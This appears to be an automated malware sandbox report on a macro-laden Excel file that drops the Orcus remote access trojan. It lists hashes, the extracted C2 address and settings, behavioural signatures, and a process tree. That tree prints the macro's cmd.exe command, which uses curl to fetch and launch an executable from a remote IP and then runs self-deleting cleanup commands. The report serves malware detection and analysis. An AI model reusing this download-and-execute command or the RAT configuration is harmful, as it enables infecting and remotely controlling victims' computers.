Analysis
-
max time kernel
134s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-02-2025 01:45
Static task
static1
Behavioral task
behavioral1
Sample
GuardianQA.xlsm
Resource
win7-20241010-en
General
-
Target
GuardianQA.xlsm
-
Size
3.7MB
-
MD5
f9379219193a6ad229cb99ea103240cc
-
SHA1
d7776b47f7d16e66d52ff3d2cda8af982f713ea4
-
SHA256
8258c96fcb836d6b29aa90529835ed1ee4fe6143bb5221459fe5e4a81b18d2e6
-
SHA512
c8fcb2db9ecdc4aa7aefd42fc003f8bd8c2a60d1ee59a4a6d573c422812b861487b0c79fd99de4e773afa60ddd4b36a5ee447089a382ddfdfce4ffa82e661a76
-
SSDEEP
98304:JjD7OuWRWu3nj7fH2a6AuxvczmQjj+xwT+aNaHmt:JjOuaWu3H2a6xeOMwmt
Malware Config
Extracted
orcus
195.88.218.126:10134
10dc32abacca449b81dcabfd916e9f3f
-
autostart_method
Disable
-
enable_keylogger
false
-
install_path
%programfiles%\Orcus\Orcus.exe
-
reconnect_delay
10000
-
registry_keyname
Orcus
-
taskscheduler_taskname
Orcus
-
watchdog_path
AppData\OrcusWatchdog.exe
Signatures
-
Orcus family
-
Orcus main payload 1 IoCs
resource yara_rule behavioral2/files/0x000a000000023b7a-41.dat family_orcus -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4844 3680 cmd.exe 81 -
Orcurs Rat Executable 2 IoCs
resource yara_rule behavioral2/files/0x000a000000023b7a-41.dat orcus behavioral2/memory/3872-43-0x0000000000DA0000-0x0000000000E88000-memory.dmp orcus -
Downloads MZ/PE file 1 IoCs
flow pid Process 16 4500 curl.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Guardian.exe -
Executes dropped EXE 1 IoCs
pid Process 3872 Guardian.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Guardian.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3200 PING.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3200 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3680 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3872 Guardian.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3680 EXCEL.EXE 3680 EXCEL.EXE 3680 EXCEL.EXE 3680 EXCEL.EXE 3680 EXCEL.EXE 3680 EXCEL.EXE 3680 EXCEL.EXE 3680 EXCEL.EXE 3680 EXCEL.EXE 3680 EXCEL.EXE 3680 EXCEL.EXE 3680 EXCEL.EXE -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 3680 wrote to memory of 4844 3680 EXCEL.EXE 85 PID 3680 wrote to memory of 4844 3680 EXCEL.EXE 85 PID 4844 wrote to memory of 4500 4844 cmd.exe 88 PID 4844 wrote to memory of 4500 4844 cmd.exe 88 PID 4844 wrote to memory of 3872 4844 cmd.exe 90 PID 4844 wrote to memory of 3872 4844 cmd.exe 90 PID 4844 wrote to memory of 3872 4844 cmd.exe 90 PID 3872 wrote to memory of 2228 3872 Guardian.exe 91 PID 3872 wrote to memory of 2228 3872 Guardian.exe 91 PID 3872 wrote to memory of 2228 3872 Guardian.exe 91 PID 2228 wrote to memory of 3200 2228 cmd.exe 93 PID 2228 wrote to memory of 3200 2228 cmd.exe 93 PID 2228 wrote to memory of 3200 2228 cmd.exe 93 PID 2228 wrote to memory of 5024 2228 cmd.exe 97 PID 2228 wrote to memory of 5024 2228 cmd.exe 97 PID 2228 wrote to memory of 5024 2228 cmd.exe 97 PID 2228 wrote to memory of 756 2228 cmd.exe 98 PID 2228 wrote to memory of 756 2228 cmd.exe 98 PID 2228 wrote to memory of 756 2228 cmd.exe 98 PID 2228 wrote to memory of 4488 2228 cmd.exe 99 PID 2228 wrote to memory of 4488 2228 cmd.exe 99 PID 2228 wrote to memory of 4488 2228 cmd.exe 99 PID 2228 wrote to memory of 2816 2228 cmd.exe 100 PID 2228 wrote to memory of 2816 2228 cmd.exe 100 PID 2228 wrote to memory of 2816 2228 cmd.exe 100
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\GuardianQA.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /V /C "set u=http://195.88.218.126:8000/Guardian.exe&set p=C:\Users\Admin\AppData\Local\Temp\Guardian.exe&curl --insecure -o !p! !u! && start !p!"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\system32\curl.execurl --insecure -o C:\Users\Admin\AppData\Local\Temp\Guardian.exe http://195.88.218.126:8000/Guardian.exe3⤵
- Downloads MZ/PE file
PID:4500
-
-
C:\Users\Admin\AppData\Local\Temp\Guardian.exeC:\Users\Admin\AppData\Local\Temp\Guardian.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\{6c4f8270-23d3-494d-8ae5-fb9ed78dea1f}.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo j "5⤵
- System Location Discovery: System Language Discovery
PID:5024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\Guardian.exe""5⤵
- System Location Discovery: System Language Discovery
PID:756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo j "5⤵
- System Location Discovery: System Language Discovery
PID:4488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del C:\Users\Admin\AppData\Local\Temp\{6c4f8270-23d3-494d-8ae5-fb9ed78dea1f}.bat"5⤵
- System Location Discovery: System Language Discovery
PID:2816
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
903KB
MD57735277130eafeaa269fee4b3c00f2bb
SHA157ae0c9d4a0f17730be54aa7dc7b808e32335101
SHA25649d0bfca5b66fc459c26eec5d98bb98efd72f3a6d0ac64141ec7eb65e3983ec7
SHA512a1807a81868d2464cd32949d30e11dc54710a6890bc6cffecfb3a83808a4468c8ddd090b9a412c094ca3138fe3fab21eb00b869e0b573c20a5c6435c14c5e59c
-
Filesize
185B
MD5e01f16f6399d58845d9a83f9bd606417
SHA100e7cacd7ac7ff10029c614c4bb9f41b18210e88
SHA256cedde6dec16c1bc04de5b520064200a6640748da86955c1c3747ea26539d4d28
SHA5128b4f46ccc3fac156b13b085d4bd036624e36bf9a0f0be962c06b6d414c0849e639991235a42333a7f8f1cb996feb5c3efe1ead219e4602514b1a25ec5a8356b2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize2KB
MD55834af59a962600de1e28e21a8b13792
SHA18394f77c64fe0481272d5d762ee2f601a0ed4bd9
SHA256014b765e8ed07e3de724aeab0dc3c9b50dc3190680ac45885dc0f94d2262a4cb
SHA51204d3f54dbba576c606a4dd25745056b5e978490c6583ec12cbb61985c817a30ed7e67068307d328dc75b525b82652ca0bd4502451367a8a543ba2fbbd3e2b6c2